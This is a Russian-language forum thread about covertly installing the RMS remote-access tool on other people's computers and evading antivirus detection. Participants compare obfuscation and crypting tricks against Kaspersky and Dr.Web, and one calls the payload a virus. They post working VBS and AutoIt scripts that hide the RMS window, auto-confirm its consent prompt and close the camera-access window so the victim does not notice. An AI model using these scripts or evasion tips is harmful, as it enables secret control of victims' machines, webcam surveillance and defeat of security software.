RMS - полностью скрытая установка и управление.

[Антоха]

По моему и так очень неплохо.Это ты обычными комментариями так сбил детект?Я конечно не знаю vbs,но мне кажется ,что если объявить побольше переменных (это ведь несложно?),то можно ещё скинуть кого-нибудь.По крайней мере ,батник можно преобразить с помощью переменных до неузнаваемости (и главное,что это просто).Кстати,когда хочешь посмотреть более полную картину по детекту антивирей,регайся

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.Сервис платный,но один раз почекать можно нахаляву.60 антивирусных душ в наличии.
P.S.И на факаве открыли доступ к сканеру (мне он больше остальных почему то нравится).

 

[Nedovirus]

Magic_Mushroom, расширение загружаемого файла не забыл на bat поменять? в двух местах.

 

[Magic_Mushroom]

Magic_Mushroom, расширение загружаемого файла не забыл на bat поменять? в двух местах.

тоже самое, обходятся левые антивири километрами текста, а смена на .бат не принесла результата, касперский как ругался , так и ругается (а главная цель обойти именно его)

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Nedovirus]

у меня переставал ругаться. видно в понедельник придется мне переделпть скрипт против каспера и выложить сюда.

также не стоит забывать о разных уровнях эвристики у каспера на компе и у консоли на сервере мультискана, может вы и правильно по моей инструкции все делаете, просто настройки разные....

 

[Антоха]

тоже самое, обходятся левые антивири километрами текста, а смена на .бат не принесла результата, касперский как ругался , так и ругается (а главная цель обойти именно его)

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

А ты не пробовал эту

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

?Палевность немного уменьшает.Тот твой скрипт (1.vbs)

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

на факавском сканере 13 движками,после шифровки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

7.А если конвертировать через неё твой уже обновлённый vbs скрипт?Хотя палева может и прибавиться)

Спойлер: тулза

 

[Magic_Mushroom]

А ты не пробовал эту

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

?Палевность немного уменьшает.Тот твой скрипт (1.vbs)

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

на факавском сканере 13 движками,после шифровки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

7.А если конвертировать через неё твой уже обновлённый vbs скрипт?Хотя палева может и прибавиться)

Спойлер: тулза

Посмотреть вложение 44138

к сожалению палева только прибавилось
до конвертирования тулзой:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

после:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Принц Птица]

УРЯЯЯЯ СБИЛ ДЕТЕКТ ДОХТОРА.................

Попробуй сейчас и живая-ли она, на запуск не проверял:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Пароль:123

Эта делка не работает! Сегодня тестировал, из-за этой делки после установки вирус не запускается.

 

[Magic_Mushroom]

Приведу пример "Штучки" на vbs:

Скопировать в буфер обмена

Set shell = WScript.CreateObject("WScript.Shell")
timeout = 5
title = "RMS_WND_HID"
Do
If shell.AppActivate(title) Then
Shell.SendKeys "%{F4}"

End If
WScript.Sleep 300
timeout = timeout - 1

Loop

Принц Птица, вот вбс скрипт на скрытие банера, забудь про эту длл :)

 

[X-Shar]

А я выкладывал скрипт Аутоит здесь, который как-раз скрывает это окно и не только это, каспер кстати не детектит, там детектил доктор и помойму Нано и всё, да и-то я там в архиве выложил и обход доктора тоже...

Почему не используете тот скрипт, вполне рабочий я проверял ?

 

[X-Shar]

Хочу сделать пару пояснений к своим видяшкам:

1)Там мелькает окно, как это убрать:
1.1)В тех скриптах был слип 300 миллесекунд, он не нужен, если его убрать, то окна будум практически незаметны...;
1.2)Можно делать уже открытые окна "Всегда поверх", кроме нашего окна с вопросом, тогда окно будет вообще невидно, вот поправил скрипт:

Скопировать в буфер обмена

;Скрипт автоматически нажимает "Да"
#NoTrayIcon
While 1
    $hRMS = WinGetHandle("Remote Manipulator System - Вопрос") ;Получаем дискриптор окна с вопросом
    $hWnd = WinGetHandle("[ACTIVE]") ;Получаем текущее активное окно
    If $hWnd<>0 and ($hRMS="")  Then
        WinSetOnTop($hWnd, "", 1) ;Делаем текуущее активное окно поверх остальных (Кроме нашего окна с вопросом)
    EndIf
      If $hRMS<>"" Then
      ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]") ;Если окно появилось, то быстренько нажимаем "Да" и выходим из цикла...
      ExitLoop ;Выходим из проги
    EndIf
WEnd

Далее прилагаю скрипт, который закроет окно камеры:

Скопировать в буфер обмена

;Закрывает окно камеры !
#NoTrayIcon
While 1 ;Наш цикл, который ожидает появления окна камеры
$hRMS2 = WinGetHandle("RMS_WND_HID") ;Получаем дискриптор окна
If $hRMS2<>"" Then
      WinClose($hRMS2) ;Закрываем окно...
    EndIf
WEnd ;И так в цикле...

З.Ы. Из-за головотяпства и спешки забыл указать ссылки на форум в видяшках, а люди спрашивают, пойду исправляться...